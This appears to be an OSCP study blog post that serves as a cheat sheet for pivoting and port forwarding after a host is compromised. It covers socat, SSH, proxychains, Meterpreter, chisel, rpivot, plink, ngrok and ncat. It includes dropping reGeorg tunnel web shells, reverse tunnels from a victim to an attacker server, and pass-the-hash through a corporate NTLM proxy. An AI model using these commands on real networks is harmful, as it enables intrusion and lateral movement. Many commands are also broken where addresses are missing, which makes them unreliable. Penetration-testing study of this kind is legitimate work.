Pivoting & Port forwarding methods – part2

OSCP Study materialAll BlogLinux privilege escalation

This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog : –

  • socat
  • windows Netsh
  • SSH
  • proxychains
  • Web Socks
  • Metasploit
  • sshuttle
  • chisel
  • Rpivot
  • Plink
  • Ngrok


To install socat, we simply run:

sudo apt-get updatesudo apt-get install socat

To run socat and forward traffic from your internet node IP port 808 to remote node port 443 run the following command:

socat TCP4-LISTEN:808,fork TCP4:

To forward traffic from your internet node from port 9090 to remote node port 22 and forward traffic from port 81 to port 21 on ftp.microsft.com run the following command:

socat TCP4-LISTEN:9090,fork TCP4:|socat TCP4-LISTEN:81,fork T CP4:ftp.microsft.com:21 

Windows Netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress= connectport=3389 connectaddress=
  1. listenaddress – is a local IP address waiting for a connection.
  2. listenport – local listening TCP port (the connection waits on it).
  3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
  4. connectport – is a TCP port to which the connection from listenport is forwarded to.



ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip: Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389: root@


Config file: /etc/proxychains.conf

socks4 localhost 8080

Set the SOCKS4 proxy then proxychains nmap -sT

Web SOCKS – reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

  • tunnel.ashx
  • tunnel.aspx
  • tunnel.js
  • tunnel.jsp
  • tunnel.nosocket.php
  • tunnel.php
  • tunnel.tomcat.5.jsp
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]


# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r
portfwd add -L -l 445 -r -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 


# Use Meterpreters autoroute script to add the route for specified subnet
run autoroute -s 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for via Session number.
route add 3 
# Meterpreter delete route for via Session number.
route delete 3 
# Meterpreter delete all routes
route flush 


The transparent proxy server that works as a poor man’s VPN. Forwards over ssh.

  • Doesn’t require admin.
  • Works with Linux and macOS.
  • Supports DNS tunnelling.
pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr sean@
sshuttle -vvr username@pivot_host 


go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88: R:389:localhost:389 
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse


Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE


# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445: 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:  

plink -l root -pw mypassword -R
plink.exe -v -pw mypassword user@ -L 6666:

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:   


# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

| Sensitive Content|

For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:

ssh root@ -L 81:

Later on, I learned to do more dynamic SSH forwards with proxychains:


I used a dynamic ssh tunnel via John:
ssh -f -N -D j0hn@ -p 22000
Tested with :
proxychains nmap -sT -Pn

ssh -f -N -D sean@
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D root@ -p 222
leafpad /etc/proxychains.conf
proxychains ssh luigi@

And even later, I did double pivoting using proxychains:

ssh -tt -L8080:localhost:8157 sean@ ssh -t -D 8157 mario@ -p 222
set up proxychains to use our forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 8080

Basic Pivoting Types

TypeUse Case
Listen – ListenExposed asset, may not want to connect out.
Listen – ConnectNormal redirect.
Connect – ConnectCan’t bind, so connect to bridge two hosts

Listen – Listen

TypeUse Case
ncatncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socatsocat -v tcp-listen:8080 tcp-listen:9090
remote host 1ncat localhost 8080 < file
remote host 2ncat localhost 9090 > newfile

Listen – Connect

TypeUse Case
ncatncat -l -v -p 8080 -c "ncat localhost 9090"
socatsocat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat localhost -p 8080 < file
remote host 2ncat -l -p 9090 > newfile

Connect – Connect

TypeUse Case
ncatncat localhost 8080 -c "ncat localhost 9090"
socatsocat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat -l -p 8080 < file
remote host 2ncat -l -p 9090 > newfile


One thought on “Pivoting & Port forwarding methods – part2

Leave a Reply

Your email address will not be published. Required fields are marked *